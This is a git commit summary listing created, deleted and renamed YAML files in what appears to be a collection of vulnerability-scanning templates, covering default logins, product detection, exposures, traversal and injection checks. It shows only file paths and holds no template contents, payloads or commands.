rename poc/default/{dubbo-admin-default-login.yaml => dubbo-admin-default-login-7120.yaml} (100%)
rename poc/default/{dvwa-default-login-7127.yaml => dvwa-default-login.yaml} (100%)
delete mode 100644 poc/default/emcecom-default-login-7211.yaml
create mode 100644 poc/default/emqx-default-login-7222.yaml
rename poc/default/{exacqvision-default-login-7277.yaml => exacqvision-default-login.yaml} (100%)
delete mode 100644 poc/default/flir-default-login-7514.yaml
create mode 100644 poc/default/flir-default-login.yaml
delete mode 100644 poc/default/frp-default-login-7556.yaml
create mode 100644 poc/default/glpi-default-login.yaml
create mode 100644 poc/default/guacamole-default-login-7859.yaml
create mode 100644 poc/default/hongdian-default-login-7997.yaml
delete mode 100644 poc/default/hongdian-default-login-7999.yaml
delete mode 100644 poc/default/huawei-HG532e-default-router-login.yaml
delete mode 100644 poc/default/hue-default-credential-8081.yaml
delete mode 100644 poc/default/hue-default-credential.yaml
delete mode 100644 poc/default/idemia-biometrics-default-login-8139.yaml
rename poc/default/{idemia-biometrics-default-login.yaml => idemia-biometrics-default-login-8141.yaml} (100%)
delete mode 100644 poc/default/iptime-default-login-8193.yaml
rename poc/default/{jenkins-default.yaml => jenkins-default-8272.yaml} (100%)
create mode 100644 poc/default/jinher-oa-default-login-8312.yaml
delete mode 100644 poc/default/jmx-default-login-8355.yaml
create mode 100644 poc/default/jmx-default-login.yaml
delete mode 100644 poc/default/jupyterhub-default-login-8400.yaml
create mode 100644 poc/default/kafka-center-default-login.yaml
create mode 100644 poc/default/lutron-iot-default-login-8675.yaml
delete mode 100644 poc/default/lutron-iot-default-login-8678.yaml
create mode 100644 poc/default/nagios-default-login-8990.yaml
delete mode 100644 poc/default/nagios-default-login-8994.yaml
delete mode 100644 poc/default/netsus-default-login-9060.yaml
create mode 100644 poc/default/netsus-default-login.yaml
delete mode 100644 poc/default/nps-default-login-9145.yaml
delete mode 100644 poc/default/octobercms-default-login-9192.yaml
create mode 100644 poc/default/octobercms-default-login.yaml
delete mode 100644 poc/default/ofbiz-default-login-9210.yaml
delete mode 100644 poc/default/openemr-default-login.yaml
delete mode 100644 poc/default/operations-automation-default-page-9337.yaml
rename poc/default/{operations-automation-default-page.yaml => operations-automation-default-page-9339.yaml} (100%)
create mode 100644 poc/default/panabit-ixcache-default-login.yaml
create mode 100644 poc/default/panos-default-login-9455.yaml
create mode 100644 poc/default/panos-default-login.yaml
delete mode 100644 poc/default/pentaho-default-login-9478.yaml
create mode 100644 poc/default/pentaho-default-login-9480.yaml
create mode 100644 poc/default/rabbitmq-default-admin-9780.yaml
delete mode 100644 poc/default/rabbitmq-default-admin-9782.yaml
create mode 100644 poc/default/rainloop-default-login.yaml
create mode 100644 poc/default/ranger-default-login-9827.yaml
create mode 100644 poc/default/rockmongo-default-login-9897.yaml
create mode 100644 poc/default/samsung-wlan-default-login-10018.yaml
create mode 100644 poc/default/supermicro-default-login.yaml
rename poc/default/{szhe-default-login.yaml => szhe-default-login-10638.yaml} (100%)
create mode 100644 poc/default/telecom-gateway-default-login.yaml
create mode 100644 poc/default/tomcat-default-login.yaml
delete mode 100644 poc/default/trilithic-viewpoint-default-10835.yaml
create mode 100644 poc/default/ucmdb-default-login-10871.yaml
rename poc/default/{ucmdb-default-login-10869.yaml => ucmdb-default-login.yaml} (100%)
delete mode 100644 poc/default/vidyo-default-login-11009.yaml
rename poc/default/{vidyo-default-login.yaml => vidyo-default-login-11010.yaml} (100%)
create mode 100644 poc/default/visionhub-default-login-11026.yaml
delete mode 100644 poc/default/wifisky-default-password-11205.yaml
delete mode 100644 poc/default/wso2-default-login.yaml
delete mode 100644 poc/default/xampp-default-page-11661.yaml
rename poc/default/{xampp-default-page.yaml => xampp-default-page-11662.yaml} (100%)
create mode 100644 poc/default/xerox7-default-login.yaml
delete mode 100644 poc/default/xxljob-default-login-11709.yaml
create mode 100644 poc/detect/RedMine-Detect.yaml
rename poc/detect/{acontent-detect-32.yaml => acontent-detect.yaml} (100%)
rename poc/detect/{addeventlistener-detect-66.yaml => addeventlistener-detect-64.yaml} (100%)
delete mode 100644 poc/detect/adobe-coldfusion-detect-82.yaml
create mode 100644 poc/detect/adobe-coldfusion-error-detect-86.yaml
rename poc/detect/{adobe-coldfusion-error-detect-88.yaml => adobe-coldfusion-error-detect.yaml} (100%)
delete mode 100644 poc/detect/airflow-detect-239.yaml
create mode 100644 poc/detect/airflow-detect-240.yaml
delete mode 100644 poc/detect/alfresco-detect-259.yaml
create mode 100644 poc/detect/alfresco-detect-260.yaml
create mode 100644 poc/detect/apache-answer-detect.yaml
create mode 100644 poc/detect/apache-axis-detect-339.yaml
rename poc/detect/{apache-axis-detect.yaml => apache-axis-detect-341.yaml} (100%)
delete mode 100644 poc/detect/apache-cocoon-detect-342.yaml
create mode 100644 poc/detect/apache-cocoon-detect.yaml
rename poc/detect/{apache-detect.yaml => apache-detect-346.yaml} (100%)
create mode 100644 poc/detect/apollo-server-detect-523.yaml
rename poc/detect/{apollo-server-detect-522.yaml => apollo-server-detect.yaml} (100%)
delete mode 100644 poc/detect/artica-web-proxy-detect-545.yaml
rename poc/detect/{artica-web-proxy-detect-543.yaml => artica-web-proxy-detect.yaml} (100%)
create mode 100644 poc/detect/autobahn-python-detect-594.yaml
delete mode 100644 poc/detect/autobahn-python-detect-595.yaml
delete mode 100644 poc/detect/avantfax-detect-600.yaml
delete mode 100644 poc/detect/aws-elastic-beanstalk-detect.yaml
rename poc/detect/{basic-auth-detection-687.yaml => basic-auth-detection-689.yaml} (100%)
delete mode 100644 poc/detect/bigbluebutton-detect-723.yaml
create mode 100644 poc/detect/bigbluebutton-detect.yaml
create mode 100644 poc/detect/bigip-config-utility-detect-730.yaml
create mode 100644 poc/detect/bigip-config-utility-detect-732.yaml
create mode 100644 poc/detect/burp-api-detect-810.yaml
delete mode 100644 poc/detect/burp-api-detect-812.yaml
delete mode 100644 poc/detect/cacti-detect-826.yaml
delete mode 100644 poc/detect/carestream-vue-detect-861.yaml
delete mode 100644 poc/detect/centreon-detect-877.yaml
delete mode 100644 poc/detect/citrix-adc-gateway-detect-981.yaml
create mode 100644 poc/detect/citrix-adc-gateway-detect-983.yaml
delete mode 100644 poc/detect/citrix-vpn-detect-987.yaml
delete mode 100644 poc/detect/cname-service-detector-1034.yaml
rename poc/detect/{cockpit-detect-1127.yaml => cockpit-detect-1126.yaml} (100%)
delete mode 100644 poc/detect/confluence-detect-1187.yaml
create mode 100644 poc/detect/confluence-detect-1189.yaml
delete mode 100644 poc/detect/craft-cms-detect.yaml
create mode 100644 poc/detect/crush-ftp-detect-1272.yaml
rename poc/detect/{csrfguard-detect-1290.yaml => csrfguard-detect.yaml} (100%)
create mode 100644 poc/detect/custom-data-result-service-detect.yaml
delete mode 100644 poc/detect/default-detect-generic-6838.yaml
create mode 100644 poc/detect/default-detect-generic.yaml
create mode 100644 poc/detect/dell-idrac7-detect.yaml
create mode 100644 poc/detect/dell-idrac9-detect-6937.yaml
create mode 100644 poc/detect/detect-dangling-cname-6967.yaml
create mode 100644 poc/detect/detect-drone-config-6973.yaml
rename poc/detect/{detect-options-method-6978.yaml => detect-options-method-6977.yaml} (100%)
create mode 100644 poc/detect/dns-waf-detect-7052.yaml
delete mode 100644 poc/detect/druid-detect-7098.yaml
create mode 100644 poc/detect/dwr-index-detect-7135.yaml
create mode 100644 poc/detect/dwr-index-detect.yaml
delete mode 100644 poc/detect/ec2-detection-7162.yaml
create mode 100644 poc/detect/ec2-detection-7163.yaml
create mode 100644 poc/detect/eg-manager-detect.yaml
create mode 100644 poc/detect/elasticsearch-sql-client-detect-7190.yaml
create mode 100644 poc/detect/epson-access-detect-7235.yaml
create mode 100644 poc/detect/fanruanoa-detect-7392.yaml
create mode 100644 poc/detect/fanruanoa2012-detect-7388.yaml
delete mode 100644 poc/detect/fanruanoa2012-detect.yaml
delete mode 100644 poc/detect/favicon-detection-7441.yaml
create mode 100644 poc/detect/froxlor-detect-7553.yaml
create mode 100644 poc/detect/gespage-detect-7603.yaml
create mode 100644 poc/detect/github-enterprise-detect-7649.yaml
delete mode 100644 poc/detect/grafana-detect-7808.yaml
create mode 100644 poc/detect/graphql-detect-7830.yaml
delete mode 100644 poc/detect/graphql-detect-7831.yaml
delete mode 100644 poc/detect/grav-cms-detect.yaml
delete mode 100644 poc/detect/gunicorn-detect-7862.yaml
delete mode 100644 poc/detect/harbor-detect-7886.yaml
delete mode 100644 poc/detect/herokuapp-detect-7937.yaml
delete mode 100644 poc/detect/herokuapp-detect-7939.yaml
create mode 100644 poc/detect/hikvision-detection-7954.yaml
create mode 100644 poc/detect/hikvision-detection-7955.yaml
delete mode 100644 poc/detect/hp-blade-admin-detect-8004.yaml
create mode 100644 poc/detect/hp-device-info-detect-8009.yaml
delete mode 100644 poc/detect/hp-device-info-detect-8010.yaml
delete mode 100644 poc/detect/hp-media-vault-detect-8030.yaml
create mode 100644 poc/detect/htpasswd-detection-8046.yaml
delete mode 100644 poc/detect/itop-detect-8203.yaml
delete mode 100644 poc/detect/jaspersoft-detect-8220.yaml
create mode 100644 poc/detect/java-rmi-detect-8227.yaml
create mode 100644 poc/detect/jboss-detect-8237.yaml
delete mode 100644 poc/detect/jboss-detect.yaml
delete mode 100644 poc/detect/jeecg-boot-detect-8248.yaml
create mode 100644 poc/detect/jellyfin-detect-8259.yaml
rename poc/detect/{jellyfin-detect-8258.yaml => jellyfin-detect.yaml} (100%)
delete mode 100644 poc/detect/jenkins-detect-8275.yaml
create mode 100644 poc/detect/jenkins-detect-8276.yaml
create mode 100644 poc/detect/jira-detect-8313.yaml
delete mode 100644 poc/detect/jira-detect-8314.yaml
delete mode 100644 poc/detect/jsf-detection-8397.yaml
create mode 100644 poc/detect/jsf-detection-8398.yaml
rename poc/detect/{kibana-detect-8484.yaml => kibana-detect-8483.yaml} (100%)
create mode 100644 poc/detect/linkerd-detect-8633.yaml
rename poc/detect/{linkerd-detect-8632.yaml => linkerd-detect.yaml} (100%)
create mode 100644 poc/detect/linkerd-service-detect-8634.yaml
delete mode 100644 poc/detect/magmi-detect-8715.yaml
create mode 100644 poc/detect/magmi-detect-8716.yaml
delete mode 100644 poc/detect/maian-cart-detect-8719.yaml
create mode 100644 poc/detect/maian-cart-detect.yaml
create mode 100644 poc/detect/mantis-detect-8780.yaml
delete mode 100644 poc/detect/metabase-detect-8804.yaml
create mode 100644 poc/detect/microsoft-exchange-server-detect-8853.yaml
create mode 100644 poc/detect/microsoft-exchange-server-detect-8854.yaml
create mode 100644 poc/detect/moinmoin-detect-8916.yaml
create mode 100644 poc/detect/mongodb-detect-8920.yaml
create mode 100644 poc/detect/moveit-detect.yaml
delete mode 100644 poc/detect/moveit-transfer-detect.yaml
delete mode 100644 poc/detect/ms-adcs-detect-8960.yaml
create mode 100644 poc/detect/ms-adcs-detect-8961.yaml
create mode 100644 poc/detect/neos-detect.yaml
create mode 100644 poc/detect/nextcloud-detect-9079.yaml
delete mode 100644 poc/detect/oauth2-detect-9181.yaml
delete mode 100644 poc/detect/octobercms-detect-9195.yaml
create mode 100644 poc/detect/oidc-detect.yaml
create mode 100644 poc/detect/oipm-detect-9219.yaml
delete mode 100644 poc/detect/oipm-detect-9222.yaml
delete mode 100644 poc/detect/olivetti-crf-detect-9244.yaml
create mode 100644 poc/detect/oneblog-detect-9246.yaml
create mode 100644 poc/detect/open-virtualization-manager-detect.yaml
delete mode 100644 poc/detect/openemr-detect-9271.yaml
create mode 100644 poc/detect/openemr-detect-9274.yaml
delete mode 100644 poc/detect/opensis-detect-9313.yaml
delete mode 100644 poc/detect/oracle-dbass-detect-9351.yaml
delete mode 100644 poc/detect/oracle-dbass-detect.yaml
create mode 100644 poc/detect/owasp-juice-shop-detected-9416.yaml
rename poc/detect/{owasp-juice-shop-detected-9418.yaml => owasp-juice-shop-detected.yaml} (100%)
delete mode 100644 poc/detect/pega-detect.yaml
delete mode 100644 poc/detect/php-proxy-detect.yaml
create mode 100644 poc/detect/phpcollab-detect-9499.yaml
delete mode 100644 poc/detect/pi-hole-detect-9581.yaml
create mode 100644 poc/detect/pi-hole-detect-9582.yaml
delete mode 100644 poc/detect/plone-cms-detect-9607.yaml
rename poc/detect/{plone-cms-detect.yaml => plone-cms-detect-9608.yaml} (100%)
create mode 100644 poc/detect/prestashop-detect-9651.yaml
delete mode 100644 poc/detect/prestashop-detect.yaml
delete mode 100644 poc/detect/prtg-detect-9706.yaml
delete mode 100644 poc/detect/puppet-node-manager-detect-9720.yaml
create mode 100644 poc/detect/puppet-node-manager-detect.yaml
delete mode 100644 poc/detect/puppetserver-detect-9722.yaml
create mode 100644 poc/detect/redmine-cli-detect-9854.yaml
create mode 100644 poc/detect/rhymix-cms-detect-9878.yaml
delete mode 100644 poc/detect/rseenet-detect-9916.yaml
create mode 100644 poc/detect/rseenet-detect.yaml
delete mode 100644 poc/detect/rstudio-detect-9917.yaml
create mode 100644 poc/detect/rstudio-detect-9919.yaml
delete mode 100644 poc/detect/sap-netweaver-detect-10047.yaml
delete mode 100644 poc/detect/sap-recon-detect-10063.yaml
create mode 100644 poc/detect/sceditor-detect-10093.yaml
create mode 100644 poc/detect/secmail-detect-10109.yaml
delete mode 100644 poc/detect/secmail-detect-10112.yaml
create mode 100644 poc/detect/seeddms-detect-10131.yaml
delete mode 100644 poc/detect/shiro-detect-10196.yaml
delete mode 100644 poc/detect/shopware-detect-10211.yaml
delete mode 100644 poc/detect/smartstore-detect.yaml
create mode 100644 poc/detect/sonicwall-email-security-detect-10384.yaml
delete mode 100644 poc/detect/sonicwall-email-security-detect.yaml
create mode 100644 poc/detect/tableau-server-detect-10643.yaml
delete mode 100644 poc/detect/tableau-server-detect.yaml
create mode 100644 poc/detect/tech-detect-10672.yaml
delete mode 100644 poc/detect/tech-detect-10673.yaml
delete mode 100644 poc/detect/telerik-dialoghandler-detect-10690.yaml
create mode 100644 poc/detect/telerik-dialoghandler-detect-10691.yaml
create mode 100644 poc/detect/thinkcmf-detection-10719.yaml
create mode 100644 poc/detect/tibco-spotfire-services-detect.yaml
create mode 100644 poc/detect/unauthorized-puppet-node-manager-detect-10958.yaml
delete mode 100644 poc/detect/unauthorized-puppet-node-manager-detect-10959.yaml
delete mode 100644 poc/detect/virtual-ema-detect-11024.yaml
create mode 100644 poc/detect/virtual-ema-detect-11025.yaml
rename poc/detect/{vmware-vrealize-detect-11057.yaml => vmware-vrealize-detect.yaml} (100%)
delete mode 100644 poc/detect/vsftpd-detection-11073.yaml
create mode 100644 poc/detect/vsftpd-detection-11075.yaml
delete mode 100644 poc/detect/waf-detect-11086.yaml
create mode 100644 poc/detect/waf-detect-11087.yaml
create mode 100644 poc/detect/wamp-xdebug-detect-11104.yaml
delete mode 100644 poc/detect/web-ftp-detect-11136.yaml
create mode 100644 poc/detect/web-suite-detect-11168.yaml
delete mode 100644 poc/detect/web-suite-detect.yaml
rename poc/detect/{weblogic-t3-detect-11152.yaml => weblogic-t3-detect-11153.yaml} (100%)
create mode 100644 poc/detect/wondercms-detect-11222.yaml
delete mode 100644 poc/detect/wondercms-detect.yaml
rename poc/detect/{wordpress-detect-11261.yaml => wordpress-detect-11260.yaml} (100%)
delete mode 100644 poc/detect/wordpress-gotmls-detect-11280.yaml
delete mode 100644 poc/detect/worksites-detection-11384.yaml
delete mode 100644 poc/detect/wowza-streaming-detect.yaml
delete mode 100644 poc/detect/wso2-apimanager-detect-11638.yaml
create mode 100644 poc/detect/wuzhicms-detect-11654.yaml
create mode 100644 poc/detect/wuzhicms-detect.yaml
create mode 100644 poc/detect/yourls-detect.yaml
rename poc/detect/{zentao-detect-11787.yaml => zentao-detect-11785.yaml} (100%)
delete mode 100644 poc/directory_listing/ecology-springframework-directory-traversal-7175.yaml
create mode 100644 poc/directory_listing/ecology-springframework-directory-traversal.yaml
delete mode 100644 poc/directory_listing/elfinder-path-traversal-7203.yaml
rename poc/directory_listing/{elFinder-path-traversal.yaml => elfinder-path-traversal.yaml} (100%)
delete mode 100644 poc/directory_listing/kingdee-eas-directory-traversal.yaml
rename poc/directory_listing/{natshell-path-traversal.yaml => natshell-path-traversal-9006.yaml} (100%)
delete mode 100644 poc/directory_listing/oa-tongda-path-traversal-9178.yaml
delete mode 100644 poc/directory_listing/oa-tongda-path-traversal-9179.yaml
create mode 100644 poc/directory_listing/pmb-directory-traversal.yaml
rename poc/directory_listing/{tpshop-directory-traversal-10823.yaml => tpshop-directory-traversal-10821.yaml} (100%)
create mode 100644 poc/directory_listing/tpshop-directory-traversal.yaml
rename poc/directory_listing/{wooyun-path-traversal.yaml => wooyun-path-traversal-11230.yaml} (100%)
delete mode 100644 poc/directory_listing/wooyun-path-traversal-11232.yaml
delete mode 100644 poc/docker/amazon-docker-config-280.yaml
delete mode 100644 poc/docker/amazon-docker-config-disclosure-278.yaml
create mode 100644 poc/docker/amazon-docker-config.yaml
delete mode 100644 poc/docker/aws-ecs-container-agent-tasks-641.yaml
delete mode 100644 poc/docker/docker-compose-config-7059.yaml
create mode 100644 poc/docker/docker-compose-config.yaml
delete mode 100644 poc/docker/docker-registry-7068.yaml
delete mode 100644 poc/docker/dockercfg-config.yaml
create mode 100644 poc/docker/dockerfile-hidden-disclosure-7061.yaml
delete mode 100644 poc/docker/dockerfile-hidden-disclosure-7063.yaml
create mode 100644 poc/docker/kubernetes-enterprise-manager-8528.yaml
delete mode 100644 poc/docker/kubernetes-enterprise-manager-8529.yaml
delete mode 100644 poc/docker/kubernetes-kustomization-disclosure.yaml
delete mode 100644 poc/docker/kubernetes-metrics.yaml
create mode 100644 poc/docker/kubernetes-pods-8542.yaml
delete mode 100644 poc/docker/kubernetes-pods-8543.yaml
rename poc/docker/{kubernetes-unauth.yaml => kubernetes-unauth(1).yaml} (100%)
rename poc/docker/{kubernetes-version.yaml => kubernetes-version-8552.yaml} (100%)
rename poc/docker/{misconfigured-docker-8902.yaml => misconfigured-docker-8900.yaml} (100%)
delete mode 100644 poc/drupal/drupal-install-7105.yaml
delete mode 100644 poc/drupal/drupal-user-enum-ajax-7111.yaml
create mode 100644 poc/elk/elasticsearch-sql-client-detect-7190.yaml
rename poc/elk/{kibana-detect-8484.yaml => kibana-detect-8483.yaml} (100%)
create mode 100644 poc/elk/kibana-panel-8485.yaml
delete mode 100644 poc/elk/kibana-panel-8486.yaml
delete mode 100644 poc/exposed/active-admin-exposure-42.yaml
create mode 100644 poc/exposed/active-admin-exposure-43.yaml
delete mode 100644 poc/exposed/adobe-connect-username-exposure-100.yaml
create mode 100644 poc/exposed/airflow-configuration-exposure-230.yaml
delete mode 100644 poc/exposed/airflow-configuration-exposure.yaml
delete mode 100644 poc/exposed/amazon-docker-config-disclosure-278.yaml
rename poc/exposed/{android-debug-database-exposed-316.yaml => android-debug-database-exposed-314.yaml} (100%)
create mode 100644 poc/exposed/ansible-config-disclosure-326.yaml
delete mode 100644 poc/exposed/ansible-config-disclosure.yaml
create mode 100644 poc/exposed/appspec-yml-disclosure-529.yaml
rename poc/exposed/{axiom-digitalocean-key-exposure-667.yaml => axiom-digitalocean-key-exposure.yaml} (100%)
create mode 100644 poc/exposed/beward-ipcamera-disclosure-715.yaml
rename poc/exposed/{caucho-resin-info-disclosure.yaml => caucho-resin-info-disclosure-871.yaml} (100%)
create mode 100644 poc/exposed/cisco-meraki-exposure-944.yaml
delete mode 100644 poc/exposed/cisco-meraki-exposure-946.yaml
rename poc/exposed/{cisco-smi-exposure-972.yaml => cisco-smi-exposure-971.yaml} (100%)
create mode 100644 poc/exposed/clockwork-dashboard-exposure-1015.yaml
create mode 100644 poc/exposed/commax-credentials-disclosure-1160.yaml
delete mode 100644 poc/exposed/couchdb-exposure-1238.yaml
create mode 100644 poc/exposed/couchdb-exposure-1239.yaml
create mode 100644 poc/exposed/credentials-disclosure-1256.yaml
create mode 100644 poc/exposed/django-debug-exposed-404.yaml
create mode 100644 poc/exposed/dockerfile-hidden-disclosure-7061.yaml
delete mode 100644 poc/exposed/dockerfile-hidden-disclosure-7063.yaml
delete mode 100644 poc/exposed/druid-console-exposure-7092.yaml
create mode 100644 poc/exposed/exposed-adb-7282.yaml
create mode 100644 poc/exposed/exposed-alps-spring-7283.yaml
create mode 100644 poc/exposed/exposed-bitkeeper-7292.yaml
rename poc/exposed/{exposed-darcs-7298.yaml => exposed-darcs-7297.yaml} (100%)
create mode 100644 poc/exposed/exposed-docker-api-7301.yaml
delete mode 100644 poc/exposed/exposed-gitignore-7303.yaml
create mode 100644 poc/exposed/exposed-hg-7312.yaml
delete mode 100644 poc/exposed/exposed-jquery-file-upload.yaml
create mode 100644 poc/exposed/exposed-kafdrop-7318.yaml
delete mode 100644 poc/exposed/exposed-nomad-7328.yaml
delete mode 100644 poc/exposed/exposed-nomad-7330.yaml
create mode 100644 poc/exposed/exposed-redis-7339.yaml
delete mode 100644 poc/exposed/exposed-sharepoint-list-7345.yaml
create mode 100644 poc/exposed/exposed-svn-7351.yaml
delete mode 100644 poc/exposed/exposed-vscode-7357.yaml
create mode 100644 poc/exposed/exposed-vscode.yaml
create mode 100644 poc/exposed/exposed-webalizer-7358.yaml
delete mode 100644 poc/exposed/exposed-webalizer-7360.yaml
delete mode 100644 poc/exposed/exposed-zookeeper-7365.yaml
create mode 100644 poc/exposed/fanruanoa2012-disclosure-7389.yaml
delete mode 100644 poc/exposed/fanruanoa2012-disclosure.yaml
delete mode 100644 poc/exposed/firebase-config-exposure.yaml
delete mode 100644 poc/exposed/flink-exposure-7509.yaml
create mode 100644 poc/exposed/flink-exposure-7511.yaml
delete mode 100644 poc/exposed/ftp-credentials-exposure-7568.yaml
create mode 100644 poc/exposed/ftp-credentials-exposure.yaml
create mode 100644 poc/exposed/git-credentials-disclosure-7641.yaml
rename poc/exposed/{git-credentials-disclosure-7640.yaml => git-credentials-disclosure.yaml} (100%)
create mode 100644 poc/exposed/github-workflows-disclosure-7664.yaml
delete mode 100644 poc/exposed/github-workflows-disclosure-7666.yaml
delete mode 100644 poc/exposed/glpi-telemetry-disclosure-7739.yaml
create mode 100644 poc/exposed/gogs-install-exposure-7755.yaml
delete mode 100644 poc/exposed/hp-ilo-serial-key-disclosure-8023.yaml
create mode 100644 poc/exposed/hp-ilo-serial-key-disclosure-8025.yaml
create mode 100644 poc/exposed/jfrog-unauth-build-exposed-8299.yaml
delete mode 100644 poc/exposed/jolokia-info-disclosure-8358.yaml
create mode 100644 poc/exposed/jolokia-info-disclosure-8359.yaml
delete mode 100644 poc/exposed/kubernetes-kustomization-disclosure.yaml
delete mode 100644 poc/exposed/lvmeng-uts-disclosure-8680.yaml
create mode 100644 poc/exposed/magento-2-exposed-api-8688.yaml
delete mode 100644 poc/exposed/magento-config-disclosure.yaml
create mode 100644 poc/exposed/netgear-router-exposure.yaml
delete mode 100644 poc/exposed/oracle-ebs-sqllog-disclosure-9369.yaml
delete mode 100644 poc/exposed/pgadmin-exposure-9490.yaml
create mode 100644 poc/exposed/pgadmin-exposure-9491.yaml
rename poc/exposed/{pmb-local-file-disclosure-9620.yaml => pmb-local-file-disclosure-9619.yaml} (100%)
create mode 100644 poc/exposed/pmb-local-file-disclosure.yaml
delete mode 100644 poc/exposed/prometheus-exposed-panel-9681.yaml
rename poc/exposed/{putty-private-key-disclosure-9732.yaml => putty-private-key-disclosure-9730.yaml} (100%)
delete mode 100644 poc/exposed/pyproject-disclosure-9737.yaml
create mode 100644 poc/exposed/pyproject-disclosure-9738.yaml
create mode 100644 poc/exposed/qihang-media-disclosure-9764.yaml
create mode 100644 poc/exposed/qihang-media-disclosure.yaml
delete mode 100644 poc/exposed/rails-secret-token-disclosure-9809.yaml
create mode 100644 poc/exposed/rails-secret-token-disclosure-9810.yaml
rename poc/exposed/{roundcube-log-disclosure-9905.yaml => roundcube-log-disclosure-9907.yaml} (100%)
create mode 100644 poc/exposed/ruijie-information-disclosure-9931.yaml
create mode 100644 poc/exposed/selenium-exposure-10137.yaml
delete mode 100644 poc/exposed/selenium-exposure-10138.yaml
delete mode 100644 poc/exposed/sensitive-storage-exposure.yaml
delete mode 100644 poc/exposed/setup-page-exposure-10181.yaml
create mode 100644 poc/exposed/snyk-ignore-file-disclosure-10347.yaml
delete mode 100644 poc/exposed/snyk-ignore-file-disclosure-10349.yaml
create mode 100644 poc/exposed/solr-exposure-10364.yaml
delete mode 100644 poc/exposed/solr-exposure-10366.yaml
delete mode 100644 poc/exposed/thinkphp-509-information-disclosure-10755.yaml
rename poc/exposed/{thumbs-db-disclosure.yaml => thumbs-db-disclosure-10763.yaml} (100%)
delete mode 100644 poc/exposed/tugboat-config-exposure-10842.yaml
rename poc/exposed/{tugboat-config-exposure.yaml => tugboat-config-exposure-10843.yaml} (100%)
rename poc/exposed/{watchguard-credentials-disclosure-11106.yaml => watchguard-credentials-disclosure.yaml} (100%)
create mode 100644 poc/exposed/wordpress-wpcourses-info-disclosure-11369.yaml
delete mode 100644 poc/exposed/wordpress-wpcourses-info-disclosure-11371.yaml
create mode 100644 poc/exposed/wp-full-path-disclosure-11455.yaml
delete mode 100644 poc/exposed/wp-full-path-disclosure-11457.yaml
rename poc/exposed/{yarn-manager-exposure-11733.yaml => yarn-manager-exposure-11731.yaml} (100%)
delete mode 100644 poc/exposed/zenphoto-installation-sensitive-info.yaml
create mode 100644 poc/exposed/zenphoto-sensitive-info-11784.yaml
create mode 100644 poc/extract/extract-urls-7370.yaml
delete mode 100644 poc/favicon/favicon-detection-7441.yaml
create mode 100644 poc/ftp/crush-ftp-detect-1272.yaml
create mode 100644 poc/ftp/crush-ftp-login-1275.yaml
create mode 100644 poc/ftp/crushftp-default-login.yaml
delete mode 100644 poc/ftp/ftp-credentials-exposure-7568.yaml
create mode 100644 poc/ftp/ftp-credentials-exposure.yaml
delete mode 100644 poc/ftp/ftp-weak-credentials-7570.yaml
rename poc/ftp/{ftpconfig.yaml => ftpconfig-7565.yaml} (100%)
delete mode 100644 poc/ftp/unauth-ftp-10942.yaml
delete mode 100644 poc/ftp/vsftpd-detection-11073.yaml
create mode 100644 poc/ftp/vsftpd-detection-11075.yaml
delete mode 100644 poc/ftp/web-ftp-detect-11136.yaml
create mode 100644 poc/fuzz/lfi-linux-fuzz.yaml
rename poc/gcloud/{GCP-service-account.yaml => GCP-service-account (copy 1).yaml} (100%)
create mode 100644 poc/gcloud/gcp-service-account-11851.yaml
rename poc/git/{axiom-digitalocean-key-exposure-667.yaml => axiom-digitalocean-key-exposure.yaml} (100%)
delete mode 100644 poc/git/exposed-gitignore-7303.yaml
create mode 100644 poc/git/git-config-7635.yaml
rename poc/git/{git-config-nginxoffbyslash-7632.yaml => git-config-nginxoffbyslash-7628.yaml} (100%)
create mode 100644 poc/git/git-config-nginxoffbyslash-7630.yaml
create mode 100644 poc/git/git-credentials-disclosure-7641.yaml
rename poc/git/{git-credentials-disclosure-7640.yaml => git-credentials-disclosure.yaml} (100%)
create mode 100644 poc/git/gitbook-takeover-7627.yaml
create mode 100644 poc/git/github-enterprise-detect-7649.yaml
create mode 100644 poc/git/github-gemfile-files-7653.yaml
create mode 100644 poc/git/github-page-config-7654.yaml
create mode 100644 poc/git/github-workflows-disclosure-7664.yaml
delete mode 100644 poc/git/github-workflows-disclosure-7666.yaml
delete mode 100644 poc/git/gitlab-public-repos.yaml
delete mode 100644 poc/git/gitlab-public-signup-7683.yaml
delete mode 100644 poc/git/gitlab-weak-login.yaml
delete mode 100644 poc/git/wordpress-git-config-11278.yaml
create mode 100644 poc/google/api-google-drive-432.yaml
delete mode 100644 poc/google/api-google-drive.yaml
create mode 100644 poc/google/google-earth-dlogin-7781.yaml
rename poc/{social/facebook-secrets.yaml => google/google-secrets.yaml} (100%)
create mode 100644 poc/google/google-storage-7788.yaml
delete mode 100644 poc/graphql/graphql-alias-batching.yaml
create mode 100644 poc/graphql/graphql-array-batching.yaml
create mode 100644 poc/graphql/graphql-detect-7830.yaml
delete mode 100644 poc/graphql/graphql-detect-7831.yaml
delete mode 100644 poc/graphql/graphql-get-method.yaml
create mode 100644 poc/graphql/hasura-graphql-ssrf-7905.yaml
create mode 100644 poc/header/header-command-injection-7919.yaml
delete mode 100644 poc/header/host-header-injection-8000.yaml
delete mode 100644 poc/header/host-header-poisoning.yaml
delete mode 100644 poc/header/http-missing-security-headers.yaml
create mode 100644 poc/header/log4j-header.yaml
create mode 100644 poc/header/oob-header-based-interaction-9250.yaml
create mode 100644 poc/header/oob-header-based-interaction.yaml
delete mode 100644 poc/header/sqli_header-10504.yaml
delete mode 100644 poc/http/apache-httpd-rce-362.yaml
delete mode 100644 poc/http/cl-te-http-smuggling.yaml
delete mode 100644 poc/http/default-lighttpd-page-6866.yaml
delete mode 100644 poc/http/http-missing-security-headers.yaml
rename poc/{other/dns-value-share-template-3.yaml => http/http-value-share-template-2.yaml} (100%)
delete mode 100644 poc/http/httpbin-open-redirect.yaml
delete mode 100644 poc/http/httpbin-panel-8051.yaml
create mode 100644 poc/http/httpd-config-8055.yaml
delete mode 100644 poc/http/httpd-config.yaml
delete mode 100644 poc/http/ibm-http-server.yaml
create mode 100644 poc/http/oracle-http-server-12c-9384.yaml
create mode 100644 poc/ibm/ibm-advanced-system-management-8088.yaml
delete mode 100644 poc/ibm/ibm-advanced-system-management-8090.yaml
delete mode 100644 poc/ibm/ibm-http-server.yaml
rename poc/ibm/{ibm-note-login-8110.yaml => ibm-note-login-8112.yaml} (100%)
delete mode 100644 poc/ibm/ibm-service-assistant-8118.yaml
delete mode 100644 poc/injection/buffalo-config-injection-798.yaml
create mode 100644 poc/injection/buffalo-config-injection-800.yaml
create mode 100644 poc/injection/buffalo-config-injection-801.yaml
create mode 100644 poc/injection/crlf-injection-1262.yaml
create mode 100644 poc/injection/duomicms-sql-injection-7124.yaml
